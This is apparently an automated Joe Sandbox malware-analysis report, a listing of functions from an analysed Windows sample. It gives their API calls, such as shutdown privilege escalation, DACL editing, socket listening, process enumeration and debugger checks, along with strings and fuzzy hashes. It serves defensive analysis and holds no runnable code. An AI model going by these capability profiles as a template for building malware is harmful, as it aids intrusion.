                                                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: FolderPath$LocalTime__swprintf
                                                • String ID: %.3d
                                                • API String ID: 3337348382-986655627
                                                • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                • FindClose.KERNEL32(00000000), ref: 0044291C
                                                • FindClose.KERNEL32(00000000), ref: 00442930
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                • FindClose.KERNEL32(00000000), ref: 004429D4
                                                  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                • FindClose.KERNEL32(00000000), ref: 004429E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*
                                                • API String ID: 2640511053-438819550
                                                • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                • GetLastError.KERNEL32 ref: 00433414
                                                • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                • String ID: SeShutdownPrivilege
                                                • API String ID: 2938487562-3733053543
                                                • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                • CopySid.ADVAPI32(00000000), ref: 00446271
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                • String ID:
                                                • API String ID: 1255039815-0
                                                • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                Download Yara Rule
                                                APIs
                                                • __swprintf.LIBCMT ref: 00433073
                                                • __swprintf.LIBCMT ref: 00433085
                                                • __wcsicoll.LIBCMT ref: 00433092
                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                • LockResource.KERNEL32(00000000), ref: 004330CA
                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                • LockResource.KERNEL32(?), ref: 00433120
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                • String ID:
                                                • API String ID: 1158019794-0
                                                • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                • String ID:
                                                • API String ID: 1737998785-0
                                                • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                • GetLastError.KERNEL32 ref: 0045D6BF
                                                • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                • API String ID: 4194297153-14809454
                                                • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                Function 0044EB59 Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 645COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove$_strncmp
                                                • String ID: @oH$\$^$h
                                                • API String ID: 2175499884-3701065813
                                                • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                                                • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                                                Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                • String ID:
                                                • API String ID: 540024437-0
                                                • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                • API String ID: 0-2872873767
                                                • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                • __wsplitpath.LIBCMT ref: 00475644
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • _wcscat.LIBCMT ref: 00475657
                                                • __wcsicoll.LIBCMT ref: 0047567B
                                                • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                • String ID:
                                                • API String ID: 2547909840-0
                                                • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                • FindClose.KERNEL32(?), ref: 004525FF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                • String ID: *.*$\VH
                                                • API String ID: 2786137511-2657498754
                                                • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                • String ID: pqI
                                                • API String ID: 2579439406-2459173057
                                                • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                Download Yara Rule
                                                APIs
                                                • __wcsicoll.LIBCMT ref: 00433349
                                                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                • __wcsicoll.LIBCMT ref: 00433375
                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
